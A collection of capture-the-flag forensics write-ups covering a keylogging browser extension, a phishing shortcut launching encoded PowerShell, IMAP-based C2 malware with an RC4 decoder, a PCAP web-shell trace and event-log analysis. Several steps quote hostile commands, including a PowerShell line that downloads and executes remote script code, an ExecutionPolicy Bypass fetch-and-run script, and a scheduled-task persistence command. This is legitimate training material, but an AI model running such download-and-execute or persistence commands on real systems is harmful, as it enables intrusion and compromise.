💻 Challenge Background:

Selene's normally secure laptop recently fell victim to a covert attack. A malicious Chrome extension was stealthily installed under the guise of a productivity tool. After noticing unusual network activity, Selene needs to trace the attack, remove the threat, and secure her system.

Our job: analyze the memory dump and recover key pieces of forensic evidence.

📦 Step 1: Initial Analysis

After downloading and extracting the provided file, we identify it as an ELF binary:

file memdump.elf

However, both Volatility and GDB failed to process the dump — likely because this was a Windows memory dump from a WSL (Windows Subsystem for Linux) environment. Binwalk, interestingly, revealed Windows-related content, further hinting at a hybrid memory space.

🔍 Step 2: Switch to Manual Analysis

With automated tools failing, we pivot to manual string analysis:

strings memdump.elf > strings.txt

We perform all analysis from this point forward by searching keywords within strings.txt.

🧩 Answers

1. What is the PID of the Original (First) Google Chrome process:

Search for:

chrome.exe

Look for the first instance of chrome.exe paired with a PID-like pattern.

Example pattern in strings:

chrome.exe --type=...
PID: 3456

2. What is the only Folder on the Desktop:

Search for:

Desktop

Look for a full path such as:

C:\Users\selene\Desktop\MalwareLogs

3. What is the Extension's ID:

Chrome extensions are stored under:

C:\Users\<user>\AppData\Local\Google\Chrome\User Data\Default\Extensions\

Search for this path or look for a 32-character lowercase string (a–p) in the strings.txt:

hlkenndednhfkekhgcdicdfddnkalmdm

4. What is the log filename in which the data is stored:

Search for suspicious filenames in the extension’s strings. You’ll find keylogger-like logs such as:

logX
logY
logZ

The pattern used is consistent, and all logs begin with log.

5. What is the URL the user navigated to:

Found in a keylogger log:

drive.google.comEnter\r\nselene|Shift|@rangers.eldoria.comEnter\r\nclip-mummify-proofs

This shows the user navigating to:

6. What is the password of selene@rangers.eldoria.com:

Same keylog entry shows the password being typed after the email:

clip-mummify-proofs

Typed out character-by-character across multiple lines — classic keylogger dump.

🧠 Final Thoughts

This challenge was unique in that automated tools like Volatility and GDB didn't help. Instead, manual strings analysis saved the day. It’s a great reminder that when tools fail, a trained human eye (and a bit of patience) is often the best tool of all.

🧾 Challenge Prompt

The Royal Archives of Eldoria have recovered a mysterious document—an old resume once belonging to Lord Malakar before his fall from grace. At first glance, it appears to be an ordinary record of his achievements as a noble knight, but hidden within the text are secrets that reveal his descent into darkness.

📁 Step 1: Download and Extract

We begin by downloading and extracting the provided archive. Inside, we find a .eml file, indicating it's an email message—likely from Microsoft Outlook.

📬 Step 2: Analyze the EML File

We throw the file into eml_analyzer, a tool for parsing .eml messages. It reveals a domain and port pointing to a hosted PHP file.

🌐 Step 3: Investigate the Host

Instead of resolving hostnames, we go directly to the IP, port, and path given in the message. Visiting the link in a browser, we begin inspecting for anything suspicious.

📄 Step 4: Hidden in Plain Sight

Clicking “View Full Resume” takes us to a new file path—something like:

/documents/Resume.pdf.lnk

Interesting! This .lnk is a Windows shortcut file. We download it for further inspection.

🔍 Step 5: Inspect the LNK File

Viewing the shortcut's properties, we see a command pointing to PowerShell with a base64-encoded payload.

Initially, decoding didn’t give the full command—likely because changing the file type broke the formatting. So, we redownloaded the .lnk, renamed it to .exe, and opened it in PE Studio to recover the full encoded PowerShell command.

🧪 Step 6: Decoding with CyberChef

Feeding the full base64 command into CyberChef, we uncover the actual PowerShell script. It’s downloading a file named client.py.

🐍 Step 7: Analyzing client.py

We download client.py and inspect the code. The presence of a variable named meterpreter_data is a huge red flag—this is likely a reverse shell client.

🔐 Step 8: Extracting the Flag

Within the script, we spot base64-encoded values. Starting with the key, we decode it:

import base64

key = base64.b64decode("SFRCezRQVF8yOF80bmRfbTFjcjBzMGZ0X3MzNHJjaD0xbjF0MTRsXzRjYzNzISF9Cg==")
print(key.decode())

This gives us:

HTB{FLAG HERE}

🏁 Flag Captured!

Overview

A catastrophic incident occurred in Tales from Eldoria, trapping thousands of players in the game. The cause? A sophisticated attack orchestrated by a mysterious entity named Malakar, who gained control over the developers' and sysadmins' systems. This write-up details the forensic analysis and steps taken to investigate, identify, and respond to the breach.

NOTE: The questions and answers cane be found at No. 6 in this list. No. 1-5 is on analysis techniques.

1. Initial Steps

1. Downloaded and extracted all provided files on an isolated virtual machine.

2. Discovered a .pcap file among the provided artifacts.

3. Loaded the .pcap into NetworkMiner for analysis (chosen over Wireshark for ease of file extraction).

2. Network Forensics via NetworkMiner

• NetworkMiner revealed a large volume of .eml, .zip, and .json files.

• Extracted files were located in AssembledFiles/ under NetworkMiner's directory.

  

  

  3. Artifact Inspection

ZIP File:

• The ZIP file labeled Eldoria was password protected.

• A related HTML file revealed the password.

Suspicious PDF:

• Unzipped file was not a PDF, but an executable disguised with a .pdf extension.

• Opened in PEStudio – confirmed malware.

• Origin IP: 192.168.91.133

4. Malware Analysis

• Identified malware as a .NET executable.

• Decompiled using JetBrains dotPeek.

• Malware (named email.exe) included an IMAP C2 channel.

• Key logic in imap_chanel.Program:

  • Parses .eml drafts

  • Decodes Base64 payloads

  • Decrypts using RC4 with a hardcoded key

  

5. Decoding the Attacker's Commands

Used the following Python script to decode Base64 + RC4 payloads:

# RC4 Decoder
import base64

def rc4(key, data):
S = list(range(256))
j = 0
out = bytearray()
for i in range(256):
j = (j + S[i] + key[i % len(key)]) % 256
S[i], S[j] = S[j], S[i]
i = j = 0
for byte in data:
i = (i + 1) % 256
j = (j + S[i]) % 256
S[i], S[j] = S[j], S[i]
out.append(byte ^ S[(S[i] + S[j]) % 256])
return bytes(out)

b64_data = """<PASTE_B64_PAYLOAD_HERE>"""
key = bytes([...]) # Hardcoded RC4 key from dotPeek

data = base64.b64decode(b64_data)
decrypted = rc4(key, data)

print(decrypted.decode(errors="ignore"))

6. Questions & Answers

Question 1:

What is the subject of the first email that the victim opened and replied to?

Answer: Found in extracted .eml HTML file found in /AssembledFiles. Please note that these files are dumped when you upload pcap into networkminer.

Question 2:

On what date and time was the suspicious email sent? (Format: YYYY-MM-DD_HH:MM)

Answer: Found in email headers via NetworkMiner. Found again in an html file

Question 3:

What is the MD5 hash of the malware file?

Answer: Uploaded disguised .exe to VirusTotal to obtain hash.

Question 4:

What credentials were used to log into the attacker's mailbox? (Format: username:password)

proplayer@email.com:completed Found in decompiled source code (Program.creds)

Question 5:

What is the name of the task scheduled by the attacker?

Synchronization Found in decoded email: schtasks /create /tn Synchronization …

Question 6:

What is the API key leaked from the highly valuable file discovered by the attacker?

sk-3498fwe09r8fw3f98fw9832fw Found in credentials.txt dumped from the infected host

7. Summary

The attack leveraged:

• Phishing email (.eml) containing a disguised malware executable.

• A stealthy persistence mechanism via scheduled tasks.

• IMAP-based command and control.

By performing detailed network forensics, static malware analysis, and RC4 decoding, we were able to uncover:

• The initial infection vector

• Attacker persistence

• C2 communication

• Leaked credentials and API keys

This investigation reveals the depth of compromise caused by Malakar and how the attacker silently trapped users within the Eldoria ecosystem.

Status: Restored. Game and system integrity can now be recovered.

Challenge Overview

Garrick and Thorin’s visit to Stonehelm took an unexpected turn when Thorin’s old rival, Bron Ironfist, challenged him to a forging contest. Thorin emerged victorious with a beautifully engineered clockwork amulet, but before he could celebrate, saboteurs stole the amulet and left behind digital footprints. Our goal is to analyze the provided evidence, reconstruct what happened, and retrieve the flag!

🔧 Step 1: Download and Set Up the Environment

1. Download the challenge file and start the Docker instance.

1. Once the Docker instance is running, make note of its IP address. We’ll need to add this IP to the hosts file so we can interact with the challenge domain (korp.htb).

🖥️ Step 2: Adding korp.htb to the Hosts File (Windows)

Since the challenge specifies korp.htb, we must manually map this hostname to our Docker instance IP.

Steps to Modify Hosts File:

1. Open Notepad as Administrator:

   • Press Start, search for Notepad.

   • Right-click Notepad → Select Run as administrator.

   • Accept the UAC prompt.

2. Open the hosts file:

   • Click File → Open.

   • Navigate to: C:\Windows\System32\drivers\etc

   • Change file type to All Files (*.*) → Select hosts.

3. Add an entry at the bottom of the file:
   [Docker-IP] korp.htb

   • Replace [Docker-IP] with your actual Docker instance IP.

4. Save & Close Notepad.

✅ Verify

Open Command Prompt and run:

ping korp.htb

If it resolves to the Docker IP, your setup is working!

📜 Step 3: Inspecting the Downloaded File

We find a PowerShell script with an encoded command. Let's decode it!

Decoding the Command

We can use CyberChef to decode the Base64-encoded PowerShell command.

Decoded Command:

IEX (New-Object Net.WebClient).DownloadString("http://korp.htb/update")

This command downloads and executes another PowerShell script from korp.htb/update.

🌐 Step 4: Triggering the Malicious Request

Since the script fetches http://korp.htb/update, we can manually visit this URL in a browser. Ensure you use the correct port!

http://korp.htb:[PORT]/update

What Happens?

This downloads update.ps1.

📄 Step 5: Analyzing update.ps1

Upon inspecting update.ps1, we find another PowerShell command that downloads yet another script (a541a.ps1).

Running the Script:

Powershell window pops up, we can see the flag for a brief second, we will need to modify to keep that window open so we can get the flag.

Modified PowerShell Script:

Invoke-WebRequest -Uri "http://korp.htb:[PORT]/a541a.ps1" -Headers @{"X-HTB-KEY"="5337a3229062ff18afede1dc913d254d"} -Method GET -OutFile a541a.ps1
powershell.exe -NoExit -ExecutionPolicy Bypass -File "a541a.ps1"

Running this Script:

1. Modify the [PORT] value to match your Docker instance.

1. Save the script as fetch_flag.ps1.

2. Run it in PowerShell.

powershell -ExecutionPolicy Bypass -File fetch_flag.ps1

🎯 Step 6: Retrieving the Flag!

Running the final script downloads a541a.ps1, executes it, and reveals the flag in a PowerShell window.

To prevent the window from closing instantly, we added -NoExit to keep it open.

💡 Enjoy your victory! 🏆

🎉 Final Thoughts

This challenge provided hands-on experience with:

• Analyzing encoded PowerShell payloads 🧐

• Decoding Base64 commands 🔎

• Bypassing execution policies 🔥

• Modifying PowerShell scripts to include necessary headers 🎯

• Investigating malicious web requests 🌐

Great job on reclaiming Thorin’s Amulet! 🏅

Foggy Intrusion CTF Write-Up:

1. PCAP Discovery: We start with a packet capture (PCAP) file and open it in Wireshark. For safety and flexibility, we save it as a raw PCAP.

2. Initial Exploration with NetworkMiner: Switching to NetworkMiner, we analyze the PCAP. There are **2 hosts, 60 files, and 5 sessions**—and a lot of PHP traffic stands out. Among the traffic, some files appear related to passwords. Suspicious!

3. Pivot Back to Wireshark: Intrigued, we dive back into Wireshark to inspect individual conversations and search for specific HTTP response codes, particularly **302 Found** and **200 OK**.

4. Follow the HTTP Stream: Right-clicking on an HTTP/1.1 **302 Found** response, we follow the HTTP stream, hoping to uncover more clues.

5. Uncovering Encoded Data: Further investigation reveals POST requests containing PHP shell code running PowerShell, which seems to be encoding data in base64.

6. Decoding the Obfuscation: The responses include compressed base64 strings. To decode this, we need a Python script capable of decompressing and converting this base64 data into readable text.

7. Extracting the Flag: Running our Python program across all the base64 responses, we finally uncover the hidden flag!

---

This step-by-step process involves analyzing network traffic and decoding obfuscated data, highlighting the power of network forensics in capturing hidden information.

Ghostly Persistence Write-Up

1. Download and Extract: Start by downloading the provided zip file and extracting its contents.

2. Identify Logs: Upon inspection, we notice the presence of Windows Event Logs.

3. Extract Event Logs: Use the `EvtxCMD` tool from Eric Zimmerman's toolkit to process the Event Logs.

4. Convert to CSV: Run `EvtxCMD` on the extracted directory to generate a CSV file containing the logs.

5. Load into Timeline Explorer: Open the CSV file in `TimeLineExplorer` to analyze the logs.

6. Search for Encoded Scripts: Within the logs, we observe paths that indicate encoded PowerShell scripts.

- First Path: `C:\Users\usr01\AppData\Local\Temp\wLDwomPJLN.ps1`

- Inspecting the payload data reveals base64-encoded content:

JHRlbXBQYXRoID0gIiRlbnY6d2luZGlyXHRlbXBcR2gwc3QudHh0IgoiSFRCe0doMHN0X0wwYzR0MTBuIiB8IE91dC1GaWxlIC1GaWxlUGF0aCAkdGVtcFBhdGggLUVuY29kaW5nIHV0Zjg=

7. Decode the First Script: Using CyberChef, decode this base64 content to reveal further details.

8. Locate the Second Script: The logs also point to another script at the path:

- `C:\Users\usr01\AppData\Local\Temp\3MZvgfcEiT.ps1`

- The content here is also base64 encoded:

X1c0c19SM3YzNGwzZH0=

9. Decode the Second Script: Decode this base64 content in CyberChef to retrieve the flag.

10. Flag Retrieval: After decoding, the flag contents are revealed.

This methodical approach allows us to use various forensic tools and decode base64 scripts to uncover hidden information in the logs and ultimately find the flag.